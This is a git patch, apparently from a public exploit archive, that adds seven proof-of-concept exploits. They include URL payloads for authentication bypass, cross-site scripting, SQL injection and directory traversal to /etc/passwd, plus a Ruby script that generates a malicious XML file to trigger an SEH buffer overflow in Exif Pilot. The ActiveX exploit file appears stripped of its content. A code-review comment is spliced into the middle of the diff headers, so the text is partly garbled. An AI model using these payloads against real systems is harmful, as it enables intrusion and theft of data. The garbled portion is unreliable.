From a04c22126e430ff0629b701749e51f1cefbb60dc Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Sat, 24 Jan 2015 08:35:30 +0000
Subject: [PATCH] Update: 2015-01-24 7 new exploits
---
files.csv | 7 +++
platforms/asp/webapps/35872.txt | 8 +++
platforms/php/webapps/35871.txt | 9 +++
platforms/php/webapps/35874.txt | 11 ++++
platforms/php/webapps/35875.txt | 9 +++
platforms/php/webapps/35877.txt | 7 +++
platforms/windows/dos/35870.rb | 70 +++++++++++++++++++++
platforms/windows/dos/35876.html | 102 +++++++++++++++++++++++++++++++
8 files changed, 223 insertions(+)
create mode 100755 platforms/asp/webapps/35872.txt
create mode 100755 platforms/php/webapps/35871.txt
create mode 100755 platforms/php/webapps/35874.txt
create mode 100755 platforms/php/webapps/35875.txt
create mode 100755 platforms/php/webapps/35877.txt
create mode 100755 platforms/windows/dos/35870.rb
create mode 100755 platforms/windows/dos/35876.html
diff --git a/files.csv b/files.csv
index 35f119b0b..b5ba4f843 100755
--- a/files.csv
+++ b/files.csv
@@ -32311,3 +32311,10 @@ id,file,description,date,author,platform,type,port
 35865,platforms/php/webapps/35865.txt,"Nibbleblog Multiple SQL Injection Vulnerabilities",2011-06-19,KedAns-Dz,php,webapps,0
 35866,platforms/php/webapps/35866.txt,"Immophp 1.1.1 Cross Site Scripting and SQL Injection Vulnerabilities",2011-06-18,KedAns-Dz,php,webapps,0
 35867,platforms/php/webapps/35867.txt,"Taha Portal 3.2 'sitemap.php' Cross Site Scripting Vulnerability",2011-06-18,Bl4ck.Viper,php,webapps,0
+35870,platforms/windows/dos/35870.rb,"Exif Pilot 4.7.2 - SEH Based Buffer Overflow",2015-01-22,"Osanda M. Jayathissa",windows,dos,0
+35871,platforms/php/webapps/35871.txt,"Sitemagic CMS 2010.04.17 'SMExt' Parameter Cross Site Scripting Vulnerability",2011-06-21,"Gjoko Krstic",php,webapps,0
+35872,platforms/asp/webapps/35872.txt,"H3C ER5100 Authentication Bypass Vulnerability",2011-06-22,128bit,asp,webapps,0
+35874,platforms/php/webapps/35874.txt,"Eshop Manager Multiple SQL Injection Vulnerabilities",2011-06-22,"Number 7",php,webapps,0
+35875,platforms/php/webapps/35875.txt,"FanUpdate 3.0 'pageTitle' Parameter Cross Site Scripting Vulnerability",2011-06-22,"High-Tech Bridge SA",php,webapps,0
+35876,platforms/windows/dos/35876.html,"Easewe FTP OCX ActiveX Control 4.5.0.9 'EaseWeFtp.ocx' Multiple Insecure Method Vulnerabilities",2011-06-22,"High-Tech Bridge SA",windows,dos,0
+35877,platforms/php/webapps/35877.txt,"Sitemagic CMS 'SMTpl' Parameter Directory Traversal Vulnerability",2011-06-23,"Andrea Bocchetti",php,webapps,0
diff --git a/platforms/asp/webapps/35872.txt b/platforms/asp/webapps/35872.txt
new file mode 100755
index 000000000..c90bf5ae7
--- /dev/null
+++ b/platforms/asp/webapps/35872.txt
@@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/48384/info
+
+The H3C ER5100 is prone to a remote authentication-bypass vulnerability.
+
+Attackers can exploit this issue to bypass the authentication mechanism and perform unauthorized actions.
+
+http://www.example.com:8080/home.asp?userLogin.asp
+http://www.example.com:8080/wan_NAT.asp?userLogin.asp
\ No newline at end of file
diff --git a/platforms/php/webapps/35871.txt b/platforms/php/webapps/35871.txt
new file mode 100755
index 000000000..22a64080d
--- /dev/null
+++ b/platforms/php/webapps/35871.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/48355/info
+
+Sitemagic CMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Sitemagic CMS 2010.04.17 is vulnerable; other versions may also be affected.
+
+http://www.example.com/index.php?SMExt=[xss]
\ No newline at end of file
diff --git a/platforms/php/webapps/35874.txt b/platforms/php/webapps/35874.txt
new file mode 100755
index 000000000..dcff46e0f
--- /dev/null
+++ b/platforms/php/webapps/35874.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/48391/info
+
+Eshop Manager is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
+
+http://www.example.com/path/catalogue.php?id_shop=7[SQLI]
+http://www.example.com/path/article.php?id_article=7[SQLI]
+http://www.example.com/path/banniere.php?id_article=7[SQLI]
+http://www.example.com/path/detail_news.php?id_article=7[SQLI]
+http://www.example.com/path/detail_produit.php?id_shop=3&ref=200308G[SQLI]
\ No newline at end of file
diff --git a/platforms/php/webapps/35875.txt b/platforms/php/webapps/35875.txt
new file mode 100755
index 000000000..21527adc7
--- /dev/null
+++ b/platforms/php/webapps/35875.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/48392/info
+
+FanUpdate is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+FanUpdate 3.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/header.php?pageTitle=%3C/title%3E%3Cscript%3Ealert%28123%29;%3C/script%3E
\ No newline at end of file
diff --git a/platforms/php/webapps/35877.txt b/platforms/php/webapps/35877.txt
new file mode 100755
index 000000000..73cdd88de
--- /dev/null
+++ b/platforms/php/webapps/35877.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/48399/info
+
+Sitemagic CMS is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to obtain arbitrary local files in the context of the webserver process.
+
+http://www.example.com/smcmsdemoint/index.php?SMTpl=../../../../../../../../../../etc/passwd%00.png
\ No newline at end of file
diff --git a/platforms/windows/dos/35870.rb b/platforms/windows/dos/35870.rb
new file mode 100755
index 000000000..6a998d986
--- /dev/null
+++ b/platforms/windows/dos/35870.rb
@@ -0,0 +1,70 @@
+#!/usr/bin/env ruby
+# Exploit Title: Exif Pilot SEH Based Buffer Overflow
+# Version: version 4.7.2
+# Download: http://www.colorpilot.com/load/exif.exe
+# Tested on: Windows XP sp2
+# Exploit Author: Osanda M. Jayathissa
+# E-Mail: osanda[cat]unseen.is
+
+=begin
+Click Tools > Options > Customize 35mm tab > Import > and choose "output.xml".
+The p/p/r addresses contains null characters.
+=end
+require 'rex'
+
+def generate_content(padding1_len, padding2_len)
+ header = "\xff\xfe"
+ header << Rex::Text.to_unicode("")
+ header << "\x0d\x00\x0a\x00"
+ header << Rex::Text.to_unicode("")
+ header << "\x0d\x00\x0a\x00"
+ header << Rex::Text.to_unicode(" ")
+ header << "\x0d\x00\x0a\x00"
+ header << Rex::Text.to_unicode(" ");
+ header << Rex::Text.to_unicode("");
+
+ for i in 0..padding1_len
+ header << Rex::Text.to_unicode("A");
+ end
+
+ header << "\xeb\x00\x06\x00\x90\x00\x90\x00" #nSEH
+ header << Rex::Text.to_unicode("CCCC"); #SEH
+
+ for i in 0..padding2_len
+ header << Rex::Text.to_unicode("A");
+ end
+
+ header << "\x0d\x00\x0a\x00\x09\x00\x09\x00"
+ header << Rex::Text.to_unicode(" ")
+ header << "\x0d\x00\x0a\x00"
+ header << Rex::Text.to_unicode(" abc")
+ header << "\x0d\x00\x0a\x00"
+ header << Rex::Text.to_unicode(" 0.000000")
+ header << "\x0d\x00\x0a\x00"
+ header << Rex::Text.to_unicode(" ")
+ header << "\x0d\x00\x0a\x00"
+ header << Rex::Text.to_unicode("")
+ header << "\x0d\x00\x0a\x00"
+ return header
+end
+
+##
+# main
+##
+
+filename = 'output.xml'
+output_handle = File.new(filename, 'wb')
+if !output_handle
+ $stdout.puts "Cannot open the file #(unknown) for writing!"
+ exit -1
+end
+
+header = generate_content(1619, 7000)
+
+$stdout.puts "Generating file #(unknown)"
+output_handle.puts header
+output_handle.close
+
+$stdout.puts "Done!"
+exit 0
+#EOF
\ No newline at end of file
diff --git a/platforms/windows/dos/35876.html b/platforms/windows/dos/35876.html
new file mode 100755
index 000000000..9ef143b5e
--- /dev/null
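Review bot: The `if !output_handle` guard after `File.new(filename, 'wb')` can never fire, because `File.new` raises an `Errno::*` exception on failure instead of returning nil, so the "Cannot open the file" message and `exit -1` are dead code and a permission or path error surfaces as an unhandled exception. Replacing the open/puts/close sequence with `File.open(filename, 'wb') { |f| f.write(header) }` closes the handle on every path and, by using `write` rather than `puts`, avoids appending a stray single-byte `\n` to the UTF-16 content (`puts` adds one because `header` ends in `\x0a\x00`, not `\n`); if a reported error path is wanted, wrap that call in `begin … rescue SystemCallError => e` and print `e.message`. Both status messages read `#(unknown)` where an interpolation such as `#{filename}` appears intended; this may be an artifact of how the page was extracted rather than the committed text, so it is worth checking against the actual file.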
+++ b/platforms/windows/dos/35876.html @@ -0,0 +1,102 @@ +source: http://www.securityfocus.com/bid/48393/info + +Easewe FTP OCX ActiveX control is prone to multiple insecure-method vulnerabilities. + +Attackers can exploit these issues to perform unauthorized actions or execute arbitrary programs. Successful exploits may result in compromise of affected computers. + +Easewe FTP OCX ActiveX control 4.5.0.9 is vulnerable; other versions may also be affected. + +1. + + + + + + +2. + + + + + + +3. + + + + + + +4. + + + + + + +5. + + + + + + + +Easewe FTP(EaseWeFtp.ocx) Insecure Method Exploit
+
+Description There is Insecure Method in (LocalFileCreate) fonction
+Found By : coolkaveh
+ +Exploited By : coolkaveh + + + + +
+ + +